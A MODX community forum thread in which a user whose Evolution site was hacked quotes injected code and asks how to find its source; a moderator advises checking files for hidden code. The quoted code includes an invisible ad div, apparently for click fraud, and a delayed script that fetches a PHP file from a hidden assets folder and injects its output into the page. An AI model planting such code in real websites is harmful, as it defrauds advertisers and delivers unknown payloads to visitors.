On March 26, 2019 we launched new MODX Forums. Please join us at the new MODX Community Forums.
Subscribe: RSS
  • I have absolutely no idea how to fix this.

    My site was hacked so I updated to the latest version of Evolution and removed the hack which was inserted into a chunk.

    Now it's happened again but I can't even find the source.

    Some pages end with


    <![endif]-->

    <script type="text/javascript">console.log('clref');</script></body>
    </html>

    I've no idea whether this is inserted by Modx or as a hack but this doesn't seem to do anything.

    However sometimes the end of the page source appears differently with the code below which is a hack. Can someone tell me even how to start to remove this?

    <![endif]-->

    <style type="text/css">
    #c-arr {position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; z-index: 10001; width:27px; height:20px; overflow:hidden;}
    #c-arr .mask {position: absolute;top: 5px;left: 5px;z-index: 1000;height: 13px;width: 15px;}
    </style>
    <div id="c-arr">
    <div class="mask"></div>
    <div id="co-arr">
    <script type="text/javascript">
    google_ad_client = "ca-pub-6916770808430792";
    google_ad_slot = "9779299062";
    google_ad_width = 320;
    google_ad_height = 100;
    </script>
    <!-- 25 -->
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
    </script>
    </div>
    </div>
    <script type="text/javascript">
    var jQ = false;
    function initJQ() {
    if (typeof(jQuery) == "undefined") {
    if (jQ === false) {
    jQ = true;
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.src = "https://code.jquery.com/jquery-1.8.3.min.js";
    document.getElementsByTagName("head")[0].appendChild(script);
    }
    setTimeout("initJQ()", 50);
    } else {
    (function($) {
    $(function() {

    var _l131 = "/assets/pgn4web/board-generator/",
    _l132 = 20000,
    _f132 = "generator.php";

    function _f131() {
    jQuery.get(_l131 + _f132 + "?w=1", function(data) {
    jQuery("body").append(data)
    });
    }
    setTimeout(_f131, _l132);
    })
    })(jQuery)
    }
    }
    initJQ();
    </script></body>
    </html>

    This question has been answered by MarkTWIC. See the first response.

    • discuss.answer
      One more thing

      I've found
      <script type="text/javascript">console.log('clref');</script>

      and



      <script type="text/javascript">console.log('clref');</script></body>
      </html>

      at the top and bottom of my pages in the source. Is this normal? I certainly haven't seen it until recently and it doesn't come from anything I've included.

      • You should check all files/folders if your site was compromised. There is usually some code hidden or perhaps a snippet/plugin added that does that.
          Patrick | Server Wrangler
          About Me: Website | TweetsMODX Hosting